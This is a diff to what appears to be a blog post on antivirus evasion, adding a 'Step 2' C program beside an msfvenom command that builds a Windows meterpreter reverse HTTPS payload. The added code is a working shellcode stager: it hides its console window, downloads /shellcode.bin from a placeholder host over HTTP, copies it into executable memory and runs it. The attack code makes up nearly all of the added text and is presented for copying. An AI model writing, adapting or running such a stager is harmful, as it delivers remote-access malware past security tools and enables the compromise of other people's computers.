--- a/_posts/2026-1-30-AV-Ev.md
+++ b/_posts/2026-1-30-AV-Ev.md
@@ -186,6 +186,98 @@ msfvenom -p windows/meterpreter_reverse_https LHOST=IP LPORT=8443 -f raw > shell
 #### Step 2:
 
 <div class="code-block-container">
+  <span class="code-lang-tag">C</span>
+  <button class="copy-btn" onclick="copyCode(this)" title="Copy code">
+    <svg width="18" height="18" fill="none" stroke="currentColor" stroke-width="2" viewBox="0 0 24 24">
+      <rect x="9" y="9" width="13" height="13" rx="2" ry="2" stroke="currentColor" fill="none"/>
+      <path d="M5 15H4a2 2 0 0 1-2-2V4a2 2 0 0 1 2-2h9a2 2 0 0 1 2 2v1" />
+    </svg>
+  </button>
+  {% raw %}
+  <pre><code class="Terminal">
+#include &lt;windows.h&gt;
+#include &lt;wininet.h&gt;
+#include &lt;stdio.h&gt;
+
+#pragma comment (lib, "Wininet.lib")
+
+int main() {
+
+    // 1. Hide Console
+    ShowWindow(GetConsoleWindow(), SW_HIDE);
+
+    // 2. Setup Connection
+    HINTERNET hInternet = InternetOpen(
+        "Mozilla/5.0",
+        INTERNET_OPEN_TYPE_DIRECT,
+        NULL,
+        NULL,
+        0
+    );
+
+    HINTERNET hConnect = InternetConnect(
+        hInternet,
+        "IP-Addr",
+        80,
+        NULL,
+        NULL,
+        INTERNET_SERVICE_HTTP,
+        0,
+        0
+    );
+
+    // Flags to prevent caching
+    DWORD flags = INTERNET_FLAG_RELOAD |
+                  INTERNET_FLAG_NO_CACHE_WRITE |
+                  INTERNET_FLAG_PRAGMA_NOCACHE;
+
+    HINTERNET hRequest = HttpOpenRequest(
+        hConnect,
+        "GET",
+        "/shellcode.bin",
+        NULL,
+        NULL,
+        NULL,
+        flags,
+        0
+    );
+
+    // Send request
+    if (!HttpSendRequest(hRequest, NULL, 0, NULL, 0)) {
+        return 0;
+    }
+
+    // 3. Allocate Memory
+    char* buffer = (char*)VirtualAlloc(
+        NULL,
+        4194304, // 4 MB
+        MEM_COMMIT,
+        PAGE_EXECUTE_READWRITE
+    );
+
+    // 4. Read Response
+    DWORD bytesRead;
+    if (InternetReadFile(hRequest, buffer, 4194304, &bytesRead)) {
+        if (bytesRead > 0) {
+            // 5. Execute shellcode
+            int (*shellcode)() = (int(*)())buffer;
+            shellcode();
+        }
+    }
+
+    // Cleanup
+    InternetCloseHandle(hRequest);
+    InternetCloseHandle(hConnect);
+    InternetCloseHandle(hInternet);
+
+    return 0;
+}
+
+</code></pre>
+  {% endraw %}
+</div>
+
+<div class="code-block-container">
   <span class="code-lang-tag">Terminal</span>
   <button class="copy-btn" onclick="copyCode(this)" title="Copy code">
     <svg width="18" height="18" fill="none" stroke="currentColor" stroke-width="2" viewBox="0 0 24 24">
